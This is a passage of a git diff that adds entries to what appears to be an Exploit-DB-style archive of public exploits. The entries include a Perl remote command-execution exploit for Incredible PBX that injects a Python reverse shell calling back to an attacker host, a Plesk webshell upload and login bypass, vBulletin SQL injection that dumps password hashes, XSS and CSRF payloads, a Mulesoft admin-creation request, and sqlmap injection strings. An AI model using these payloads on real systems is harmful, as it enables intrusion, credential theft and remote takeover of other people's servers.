is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + +COMPANY: Evolution Security GmbH +BUSINESS: www.evolution-sec.com + + diff --git a/platforms/jsp/webapps/35079.txt b/platforms/jsp/webapps/35079.txt new file mode 100755 index 000000000..e77317731 --- /dev/null +++ b/platforms/jsp/webapps/35079.txt @@ -0,0 +1,53 @@ +Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation ? Remote Code +Execution + + + + Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to +create an administrator user due to a lack of permissions check in the +handler/securityService.rpc endpoint. The following HTTP request can be +made by any authenticated user, even those with a single role of Monitor. + + + POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1 + +Host: 192.168.0.22:8585 + +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) +Gecko/20100101 Firefox/31.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: text/x-gwt-rpc; charset=utf-8/ + +Referer: http://192.168.0.22:8585/mmc-3.5.1/index.jsp + +Content-Length: 503 + +Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4; + +Connection: keep-alive + +Pragma: no-cache + +Cache-Control: no-cache + + 7|0|15|http://192.168.0.22:8585/mmc-3.5.1/com.mulesoft.mmc.MMC/ +|5192695B02944BAAB195B91AB3FDDA48|org.mule.galaxy.web.rpc.RemoteSecurityService|addUser|org.mule.galaxy.web.rpc.WUser/4112688705|java.lang.String/2004016611| +fdsafdsa@fdsafdsa.com +|java.util.ArrayList/4159755760|298e8098-ff3e-4d13-b37e-3f3d33193ed9|ed4cbe90-085d-4d44-976c-436eb1d78d16|ccd8aee7-30bb-42e1-8218-cfd9261c7af9|d63c1710-e811-4c3c-aeb6-e474742ac084|fdsa|notadmin|notpassword|1|2|3|4|2|5|6|5|7|8|4|6|9|6|10|6|11|6|12|0|13|0|0|14|15| + + + This request will create an administrator with all roles with a username +of notadmin and a password of notpassword. Many vectors of remote code +execution are available to an administrator. Not only can an administrator +deploy WAR applications, they can also evaluate arbitrary groovy scripts +via the web interface. + +-- +http://volatile-minds.blogspot.com -- blog +http://www.volatileminds.net -- website \ No newline at end of file diff --git a/platforms/linux/dos/35081.txt b/platforms/linux/dos/35081.txt new file mode 100755 index 000000000..b8b415433 --- /dev/null +++ b/platforms/linux/dos/35081.txt @@ -0,0 +1,61 @@ +Many shell users, and certainly a lot of the people working in +computer forensics or other fields of information security, have a +habit of running /usr/bin/strings on binary files originating from the +Internet. Their understanding is that the tool simply scans the file +for runs of printable characters and dumps them to stdout - something +that is very unlikely to put you at any risk. + +It is much less known that the Linux version of strings is an integral +part of GNU binutils, a suite of tools that specializes in the +manipulation of several dozen executable formats using a bundled +library called libbfd. Other well-known utilities in that suite +include objdump and readelf. + +Perhaps simply by the virtue of being a part of that bundle, the +strings utility tries to leverage the common libbfd infrastructure to +detect supported executable formats and "optimize" the process by +extracting text only from specific sections of the file. +Unfortunately, the underlying library can be hardly described as safe: +a quick pass with afl [1] (and probably with any other competent +fuzzer) quickly reveals a range of troubling and likely exploitable +out-of-bounds crashes due to very limited range checking. In binutils +2.24, you can try: + +$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2 + +EDB Mirror: http://www.exploit-db.com/sploits/35081 + +... +$ strings strings-bfd-badptr2 +Segmentation fault +... +strings[24479]: segfault at 4141416d ip 0807a4e7 sp bf80ca60 error 4 +in strings[8048000+9a000] +... + while (--n_elt != 0) + if ((++idx)->shdr->bfd_section) + elf_sec_group (idx->shdr->bfd_section) = shdr->bfd_section; +... +(gdb) p idx->shdr +$1 = (Elf_Internal_Shdr *) 0x41414141 + +In other words, this code appears to first read and then write to an +arbitrary pointer (0x41414141) taken from the input file. Many Linux +distributions ship strings without ASLR, making potential attacks +easier and more reliable - a situation reminiscent of one of +CVE-2014-6277 in bash [2]. + +Interestingly, the problems with the utility aren't exactly new; Tavis +spotted the first signs of trouble in other parts of libbfd some nine +years ago [3]. + +In any case: the bottom line is that if you are used to running +strings on random files, or depend on any libbfd-based tools for +forensic purposes, you should probably change your habits. For strings +specifically, invoking it with the -a parameter seems to inhibit the +use of libbfd. Distro vendors may want to consider making the -a mode +default, too. + +[1] Obligatory plug: http://code.google.com/p/american-fuzzy-lop/ +[2] http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html +[3] https://bugs.gentoo.org/show_bug.cgi?id=91398 diff --git a/platforms/multiple/remote/35062.txt b/platforms/multiple/remote/35062.txt new file mode 100755 index 000000000..7e80e2ac4 --- /dev/null +++ b/platforms/multiple/remote/35062.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45245/info + +RDM Embedded is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. The issue affects the 'lm_tcp' service. + +Successful exploits may allow an attacker to execute arbitrary code in the context of a user running an application that uses the affected library. Failed exploit attempts may crash the application, denying service to legitimate users. + +The issue affects lm_tcp <= 9.0.0 0248.18.0.0; other versions may also be affected. + +http://www.exploit-db.com/sploits/35062.zip \ No newline at end of file diff --git a/platforms/multiple/webapps/35076.py b/platforms/multiple/webapps/35076.py new file mode 100755 index 000000000..7bb2dc826 --- /dev/null +++ b/platforms/multiple/webapps/35076.py @@ -0,0 +1,89 @@ +#!/usr/bin/python +# Exploit Title: HP Operations Agent / HP Communications Broker Remote XSS iFrame Injection +# Date: 10/16/2014 +# Exploit Author: Matt Schmidt (Syph0n) +# Vendor Homepage: www.hp.com +# Version: HP Operations Manager/Operations Agent / OpenView Communications Broker < 11.14 +# Tested on: Windows 7, SunOS, RHEL Linux +# CVE : CVE-2014-2647 +# +# This script was written to exploit a remote cross-site scripting vulnerability in HP Communication Broker/ HP Operations Agent. +# This vulnerability is stored in nature until the connection is terminated as it adds the XSS string to the User Agent. +# Vulnerable page: /Hewlett-Packard/OpenView/BBC/status +# This Exploit injects a Hidden iFrame which can be used for Social Engineering attacks as a browser exploit or other malicious URL can be embedded. +# +# Vulnerability Discovered by: Matt Schmidt (Syph0n) +# Timeline: +# 07/07/2014 - Submitted Discovery to ZDI +# 07/08/2014 - ZDI decided not to accept this vulnerability and directed to HP SSRT. +# 07/12/2014 - Contacted HP SSRT +# 07/13/2014 - HP SSRT assigned Case SSRT101643 +# 07/17/2014 - Submitted Discovery and PoC exploit code to HP SSRT +# 07/30/2014 - Followed up with HP +# 07/31/2014 - Response from HP Indicating they need more time for Engineering to look into the submission +# 08/13/2014 - Followed up with HP +# 08/13/2014 - Response from HP stating that this issue will be resolved in version OA 11.14 +# 08/24/2014 - Followed up with HP on CVE Identified and Disclosure Date +# 08/31/2014 - Followed up with HP again as no response to previous email +# 09/04/2014 - Followed up with HP again as no response to previous two emails +# 09/14/2014 - Followed up with HP again as no response to previous three emails +# 09/16/2014 - HP Responded stating they where "sorting out various items concerning this issue" +# 10/01/2014 - Followed up with HP asking for Disclosure Date and CVE Identifier +# 10/06/2014 - HP Responded indicating a disclosure was due out the week of the 6th. +# 10/15/2014 - HP Issued the following Security Bulletin regarding this vulnerability - https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472444 +# 10/15/2014 - CVE-2014-2647 Issued for this vulnerability + +import argparse, socket, sys + + +# Define Help Menu +if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'): + print '\nUsage: ./exploit.py "+ agent +"\r\n\r\n" + + # Create Socket and check connection to target. + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + print "[*] Checking host: " +host+"\n" + try: + s.connect((host, int(port))) + except Exception as e: + print "[+] Error Connecting: ", e + exit() + print "[*] Sending payload to HP OpenView HTTP Communication host " +host+"\n" + + # Keep connection alive + while payload != 'q': + s.send(payload.encode()) + + data = s.recv(1024) + print "[*] Payload Sent." + + payload = raw_input("\n[+] Keeping Connection Open ([q]uit):") + return + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/platforms/php/webapps/34593.txt b/platforms/php/webapps/34593.txt new file mode 100755 index 000000000..d7406fb05 --- /dev/null +++ b/platforms/php/webapps/34593.txt @@ -0,0 +1,75 @@ +#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +# Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder +# Author : alieye +# vendor : http://www.parallels.com/ +# Contact : cseye_ut@yahoo.com +# Risk : High +# Class: Remote +# +# Google Dork: +# inurl::2006/Sites ext:aspx +# inurl::2006 inurl:.ashx?mediaid +# intext:"© Copyright 2004-2007 SWsoft." ext:aspx +# inurl:Wizard/HostingPreview.aspx?SiteID +# +# Date: 23/07/2014 +# os : windows server 2003 +# poc video clip : http://alieye.persiangig.com/video/plesk.rar/download +# +# version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010 +# version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014 +#++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + +1-bypass loginpage (all version) +http://victim.com:2006/login.aspx +change url path to http://victim.com:2006/wizard + +--------------------------------------------------------- + +2-uploading shell via Live HTTP Headers(Copyright 2004-2010) + + +Tools Needed: Live HTTP Headers, Backdoor Shell + +Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx +Step 2: Rename your shell to shell.asp.gif and start capturing data with +Live HTTP Headers +Step 3: Replay data with Live HTTP Headers - +Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n] +Step 5: go to shell path: +http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp + +--------------------------------------------------------- + +3-Arbitrary File Download Vulnerability(all version) +You can download any file from your target + +http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename + +example: +http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config + +--------------------------------------------------------- + +4-xss(all version) +you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx +goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :) + +--------------------------------------------------------- + +5-not authentication for making a website(all version) +making malicious page and phishing page with these paths +http://victim.com:2006/Wizard/Pages.aspx +http://victim.com:2006/Wizard/Edit.aspx + +#++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +[#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir +[#] Thanks To All cseye members and All Iranian Hackers +[#] website : http://cseye.vcp.ir/ +#++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +[#] Spt Tnx To Master of Persian Music: Hossein Alizadeh +[#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/ +[#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar +#++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \ No newline at end of file diff --git a/platforms/php/webapps/34717.txt b/platforms/php/webapps/34717.txt new file mode 100755 index 000000000..3460ee77c --- /dev/null +++ b/platforms/php/webapps/34717.txt @@ -0,0 +1,31 @@ +#Title: vBulletin Verify Email Before Registration Plugin - SQL Injection +#Date: September 19 2014 +#Version: Any vBulletin 4.*.* version which has the plugin installed. +#Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164 +#Author: Dave (FW/FG) + +The vulnerability resides in the register_form_complete hook, and some +other hooks. +The POST/GET data is not sanitized before being used in queries. + +SQL injection at: +http://example.com/register.php?so=1&emailcode=[sqli] + +PoC: +http://example.com/register.php?so=1&emailcode=1' UNION SELECT null, +concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM +user WHERE userid = '1 + +Now look at the source of the page and find: + + + +Vulnerable hooks: +profile_updatepassword_complete (Email field when you want to change +your email address after being logged in.) +register_addmember_complete (After submitting the final registration form.) +register_addmember_process +register_form_complete (This example) +register_start (Email confirmation form at register.php) diff --git a/platforms/php/webapps/34965.txt b/platforms/php/webapps/34965.txt new file mode 100755 index 000000000..227e3964f --- /dev/null +++ b/platforms/php/webapps/34965.txt @@ -0,0 +1,47 @@ +# Exploit Title: RBS Change Complet Open Source multiple CSRF vulnerabilities POST and GET +# Date: 10/10/2014 +# Exploit Author: KrustyHack +# Vendor Homepage: http://www.rbschange.fr/ +# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html +# Version: 3.6.8 +# Tested on: Chrome, Firefox + +DESCRIPTION +=========== + +Multiple CSRF vulnerabilities into RBS CHange Complet Open Source CMS which allow an attacker to tricks a regular logged in user by executing basket related commands like adding a product to the basket, setting a new shipping address, setting delivery mode, confirm basket and in some case confirm payment (tested with payment by check), ... + +These tricks can be done by an HTML POST form or by a simple GET request (a link that the victims click on, an image that the victims see, ...). + +HOW TO +====== + +First, the attacker need to know some paramaters as shopId, productId and other forms variables wich may differ regard to the CMS installation. It's not very difficult, he just need to register an account and look for a product then pick the differents variables by inspecting the HTML code. + +He need to look for all the checkout process urls wich can differ on all RBS Change installation (due to urls rewritting). + +In these examples we use the demo.rbschange.fr website wich is the demonstration site of the CMS. + +Text marked [VAR] need to be modified by the attacker and may need HTML code inspection. + + +- Add to basket: /fr/action/order/AddToCart?quantity=1&shopId=SHOPID&productId=PRODUCTID + +- Checkout: /fr/website/Mon-panier,13494.html?orderParam[website_BlockAction_submit][cartb_9][Order]="Je commande" GET OK + +- Setting the shipping address: /fr/website/Commande-Adresse,13502.html?orderParam[billing-registered]=15&orderParam[billing-firstname]=[VICTIMFIRSTNAME]&orderParam[billing-lastname]=[VICTIMLASTNAME]&orderParam[billing-addressline1]="[VICTIMSTREET]"&orderParam[billing-zipcode]=[VICTIMZIPCODE]&orderParam[billing-city]=[VICTIMCITY]&orderParam[billing-country]=[COUNTRYCODE]&orderParam[shipping-usesameaddress]=0&orderParam[shipping-registered]=15&orderParam[shipping-firstname]=Krusty&orderParam[shipping-lastname]=Hack&orderParam[shipping-addressline1]="15, rue du oui"&orderParam[shipping-zipcode]=75000&orderParam[shipping-city]=Paris&orderParam[shipping-country]=[COUNTRYCODE]&orderParam[submited]=99k&orderParam[website_BlockAction_submit][stdAddressStepb_9][nextStep]="Continuer la commande" + +- Setting delivery mode: /fr/website/Commande-Livraison,13503.html?orderParam[shippingFilterId]=[SHIPPINGFILTERID]&orderParam[website_BlockAction_submit][stdShippingStepb_9][nextStep]="Continuer la commande" + +- Setting payment method: http://demo.rbschange.fr/fr/website/Commande-Paiement.html?orderParam[paymentFilterId]=[PAYMENTFILTERID]&orderParam[website_BlockAction_submit][stdBillingStepb_9][nextStep]="Continuer la commande" + +- Confirm payment (here it's a payment by check): http://demo.rbschange.fr/fr/action/payment/BankResponseCheque?accept=1&paymentParam%5Baccept%5D=1 + +- And it's done. All the checkout process was done. + +Warning: nextStep (e.g: orderParam[website_BlockAction_submit][stdBillingStepb_9][nextStep]="Continuer la commande") variables may differ according to the language used into the website. HTML code inspection again ! :) + +WHY +=== + +All the forms doesn't use neither proper verification of HTTP request origin nor CSRF token. And all forms allow both GET and POST request. \ No newline at end of file diff --git a/platforms/php/webapps/35046.txt b/platforms/php/webapps/35046.txt new file mode 100755 index 000000000..31bffaad1 --- /dev/null +++ b/platforms/php/webapps/35046.txt @@ -0,0 +1,57 @@ + + + + + + + +
+ +
+ + diff --git a/platforms/php/webapps/35066.txt b/platforms/php/webapps/35066.txt new file mode 100755 index 000000000..e72ae8c1d --- /dev/null +++ b/platforms/php/webapps/35066.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45266/info + +The Processing Embed plugin for Wordpress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +WordPress Processing Embed plugin 0.5 is vulnerable; other versions may also be affected. + +http://www.example.com/wordpress/wp-content/plugins/wordpress-processing-embed/data/popup.php?pluginurl=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35067.txt b/platforms/php/webapps/35067.txt new file mode 100755 index 000000000..655cdbade --- /dev/null +++ b/platforms/php/webapps/35067.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45267/info + +The Safe Search plugin for Wordpress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Safe Search 0.7 is vulnerable; other versions may also be affected. 2010-12-08 + +http://www.example.com/wordpress/wp-content/plugins/wp-safe-search/wp-safe-search-jx.php?v1=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35072.txt b/platforms/php/webapps/35072.txt new file mode 100755 index 000000000..4c32b89cd --- /dev/null +++ b/platforms/php/webapps/35072.txt @@ -0,0 +1,37 @@ +source: http://www.securityfocus.com/bid/45276/info + +The Embedded Media Field, Media: Video Flotsam, and Media: Audio Flotsam modules for Drupal are prone to multiple remote vulnerabilities, including: + +1. An HTML-injection vulnerability +2. An arbitrary-file-upload vulnerability. + +An attacker could exploit these vulnerabilities to execute arbitrary script code in a user's browser in the context of the affected site or execute arbitrary code on the server. + +The following products and versions are affected: + +Embedded Media Field module for Drupal 6.x versions prior to 6.x-1.26 and 6.x-2.4, and for Drupal 5.x versions prior to 5.x-1.12 +Media: Video Flotsam module for Drupal 6.x versions prior to 6.x-1.2 +Media: Audio Flotsam module for Drupal 6.x versions prior to 6.x-1.1 + +1. Install Drupal 6-19, CCK module, and Embedded Media Field module version 6.x-1.25 +2. Enable the Content, Embedded Media Field, Embedded Audio Field modules from ?q=/admin/build/modules +3. Alter the default 'Story' content type at ?q=admin/content/node-type/story/fields +4. Add a 'New Field' in the form at the bottom of this page with the label 'audio' the field name 'field_audio' the type 'Embedded Audio' and the form element '3rd Party Aduio' then click the 'Save' button +5. Configure the new video field from ?q=admin/content/node-type/story/fields/field_video +6. Select all content providers for convenience and click 'Save field settings' button at the bottom of the form +7. Create a new piece of story content from ?q=node/add/story entering arbitrary values. +8. Enter "'/>.png" and click the 'Upload' button +8. Observe the rendered javascript alert dialogue +9. Click the 'Save' button so that the XSS persists to future node edits \ No newline at end of file diff --git a/platforms/php/webapps/35073.txt b/platforms/php/webapps/35073.txt new file mode 100755 index 000000000..6406bf0f4 --- /dev/null +++ b/platforms/php/webapps/35073.txt @@ -0,0 +1,67 @@ +###################### + +# Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability + +# Exploit Author : Claudio Viviani + +# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip + +# Date : 2014-10-23 + +# Tested on : Windows 7 / Mozilla Firefox + Windows 7 / sqlmap (0.8-1) + Linux / Mozilla Firefox + Linux / sqlmap 1.0-dev-5b2ded0 + +###################### + + +# Description + +CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability + +calid variable is not sanitized. + +###################### + +# PoC + +http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 [Sqli] + +# Sqlmap + +--- +Place: GET +Parameter: calid + Type: boolean-based blind + Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) + Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 RLIKE (SELECT (CASE WHEN (9095=9095) THEN 1 ELSE 0x28 END)) + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause + Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND (SELECT 3807 FROM(SELECT COUNT(*),CONCAT(0x7171736971,(SELECT (CASE WHEN (3807=3807) THEN 1 ELSE 0 END)),0x716b716671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) + + Type: UNION query + Title: MySQL UNION query (NULL) - 14 columns + Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171736971,0x6f7642724e6743615973,0x716b716671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# + + Type: AND/OR time-based blind + Title: MySQL < 5.0.12 AND time-based blind (heavy query) + Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND 8168=BENCHMARK(5000000,MD5(0x4a4a6d41)) +--- + + +##################### + +Discovered By : Claudio Viviani + http://www.homelab.it + + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww + +##################### \ No newline at end of file diff --git a/platforms/php/webapps/35080.pl b/platforms/php/webapps/35080.pl new file mode 100755 index 000000000..8346f7c3b --- /dev/null +++ b/platforms/php/webapps/35080.pl @@ -0,0 +1,186 @@ +#!/usr/bin/perl +# +# Title: Incredible PBX remote command execution exploit +# Author: Simo Ben youssef +# Contact: Simo_at_Morxploit_com +# Discovered: 1 September 2014 +# Coded: 21 October 2014 +# Published: 21 October 2014 +# MorXploit Research +# http://www.MorXploit.com +# Vendor: PBX in a Flash +# Vendor url: http://pbxinaflash.net/ +# Software: Incredible PBX 11 +# Version: 2.0.6.5.0 +# Product url: http://incrediblepbx.com/ +# Vulnerable file: reminders/index.php +# +# About (from their website): +# Incredible PBX is a secure and feature-rich implementation of the terrific Asterisk® PBX. By rethinking the PBX security model from the +# ground up, Incredible PBX was engineered to provide rock-solid security while delivering the most comprehensive collection of Asterisk +# utilities available on the planet including free calling in the U.S. and Canada courtesy of Google Voice. +# +# Description: +# reminders/index.php which ships with Incredible PBX suffers from a command execution vulnerability, allowing an authenticated user to +# inject commands as the asterisk user. +# +# Vulnerable code: +# 484: system $retcode3 = system("sox $tmpwave -r 8000 -c 1 $newgsm"); +# 472: $tmpwave = "/tmp/$token.wav"; +# 469: $token = md5(uniqid("")); +# 483: $newgsm = "/var/lib/asterisk/sounds/custom/" . $APPTTIME . "." . $APPTDT . "." . $APPTPHONE . ".gsm"; +# 381: $APPTTIME = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTTIME); +# 375: $APPTTIME = $_REQUEST['APPTHR'] . $_REQUEST['APPTMIN']; +# 380: $APPTDT = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTDT); +# 374: $APPTDT = $_REQUEST['APPTYR'] . $_REQUEST['APPTMO'] . $_REQUEST['APPTDA']; +# 382: $APPTPHONE = str_replace(array(chr(13), chr(10), "<", ">", " ", "(", ")", "-", "."), "", $APPTPHONE); +# 376: $APPTPHONE = $_REQUEST['APPTPHONE']; +# +# As you can see, none of user input sent through $_REQUEST[] parameters is being validated/sanitized before being passed it to system(); +# +# Exploit: +# As PoC, the below perl code will try to exploit $_REQUEST['APPTMIN'] to inject a python connect back shell. +# +# Note: +# Access to reminders/index.php requires 'maint' password, in the exploit code we have used the default installation password which is +# 'password'. +# +# Demo: +# ==================================================== +# --- Incredible PBX remote command execution exploit +# --- By: Simo Ben youssef +# --- MorXploit Research www.MorXploit.com +# ==================================================== +# [*] MorXploiting http://10.0.0.20/reminders/index.php +# [+] Sent payload! Waiting for connect back shell ... +# sh: no job control in this shell +# sh-4.1$ id; cat /etc/issue +# id; cat /etc/issue +# uid=498(asterisk) gid=497(asterisk) groups=497(asterisk) +# CentOS release 6.5 (Custom) on \m +# Welcome to PBX in a Flash - Green +# Please log in to continue +# ****************************************** +# Your IP Address is: +# +# 10.0.0.20 +# ****************************************** +# +# Download: +# http://www.morxploit.com/morxploits/morxincpbx.pl +# +# Requires LWP::UserAgent +# apt-get install libwww-perl +# yum install libwww-perl +# perl -MCPAN -e 'install Bundle::LWP' +# For SSL support: +# apt-get install liblwp-protocol-https-perl +# yum install perl-Crypt-SSLeay +# +# Author disclaimer: +# The information contained in this entire document is for educational, demonstration and testing purposes only. +# Author cannot be held responsible for any malicious use or damage. Use at your own risk. + +use LWP::UserAgent; +use MIME::Base64; +use IO::Socket; +use strict; + +sub banner { +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); +print "====================================================\n"; +print "--- Incredible PBX remote command execution exploit\n"; +print "--- By: Simo Ben youssef \n"; +print "--- MorXploit Research www.MorXploit.com\n"; +print "====================================================\n"; +} + +if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) { +banner(); +print "perl $0 \n"; +print "perl $0 http://10.0.0.16 10.0.0.2 31337\n"; +exit; +} + +my $host = $ARGV[0]; +my $vuln = "reminders/index.php"; +my $cbhost = $ARGV[1]; +my $cbport = $ARGV[2]; +my $defuser = "maint"; # Default maint user +my $defpass = "password"; # Default maint pass +my $string = "$defuser:$defpass"; +my $host2 = "http://localhost:81"; +my $encoded = encode_base64($string); +$| = 1; +$SIG{CHLD} = 'IGNORE'; + +my $l_sock = IO::Socket::INET->new( +Proto => "tcp", +LocalPort => "$cbport", +Listen => 1, +LocalAddr => "0.0.0.0", +Reuse => 1, +) or die "[-] Could not listen on $cbport: $!\n"; + +sub randomagent { +my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', +'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', +'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', +'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', +'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', +'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' +); +my $random = $array[rand @array]; +return($random); +} +my $useragent = randomagent(); + +my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); +$ua->timeout(10); +$ua->agent($useragent); +my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded"); +unless ($status->is_success) { +banner(); +print "[-] Error: " . $status->status_line . "\n"; +exit; +} + +banner(); +print "[*] MorXploiting $host/$vuln\n"; + +my $payload = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$cbhost\",$cbport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"; +my $get = "APPTDA=morx&APPTPHONE=morx&APPTMO=morx&APPTMIN=;$payload;&APPTHR=morx"; +my $exploit = $ua->get("$host/$vuln?$get", Authorization => "Basic $encoded"); +print "[+] Sent payload! Waiting for connect back root shell ...\n"; + +my $a_sock = $l_sock->accept(); +$l_sock->shutdown(SHUT_RDWR); +copy_data_bidi($a_sock); + +sub copy_data_bidi { +my ($socket) = @_; +my $child_pid = fork(); +if (! $child_pid) { +close(STDIN); +copy_data_mono($socket, *STDOUT); +$socket->shutdown(SHUT_RD); +exit(); +} else { +close(STDOUT); +copy_data_mono(*STDIN, $socket); +$socket->shutdown(SHUT_WR); +kill("TERM", $child_pid); +} +} +sub copy_data_mono { +my ($src, $dst) = @_; +my $buf; +while (my $read_len = sysread($src, $buf, 4096)) { +my $write_len = $read_len; +while ($write_len) { +my $written_len = syswrite($dst, $buf); +return unless $written_len; +$write_len -= $written_len; +} +} +} \ No newline at end of file diff --git a/platforms/unix/remote/35078.rb b/platforms/unix/remote/35078.rb new file mode 100755 index 000000000..1d6ce19e4 --- /dev/null +++ 